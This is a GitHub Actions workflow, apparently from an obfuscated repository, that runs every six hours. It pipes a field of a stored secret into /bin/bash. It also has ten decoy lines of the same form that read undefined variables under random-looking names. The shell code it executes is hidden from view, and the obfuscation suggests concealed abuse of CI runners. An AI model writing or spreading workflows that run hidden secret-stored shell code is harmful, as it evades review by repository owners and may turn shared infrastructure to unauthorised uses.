name: duanzhixing2016
on:
  workflow_dispatch:
  schedule:
    - cron: '15 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: duanzhixing2016
        env:
          z8: ${{ secrets.z8 }}
        run: |
          echo $z8 | jq -r .deub369 | /bin/bash
          echo $qp7 | jq -r .nykno70 | /bin/bash
          echo $se3426 | jq -r .xsv49 | /bin/bash
          echo $vp95 | jq -r .qi07 | /bin/bash
          echo $rek1998 | jq -r .qfkw016 | /bin/bash
          echo $iuv6693 | jq -r .oso87571 | /bin/bash
          echo $u0 | jq -r .poyp612 | /bin/bash
          echo $voq22451 | jq -r .sc8646 | /bin/bash
          echo $ue6676 | jq -r .kzq4975 | /bin/bash
          echo $z63 | jq -r .tt347 | /bin/bash
          echo $hkpey98169 | jq -r .nmii84254 | /bin/bash

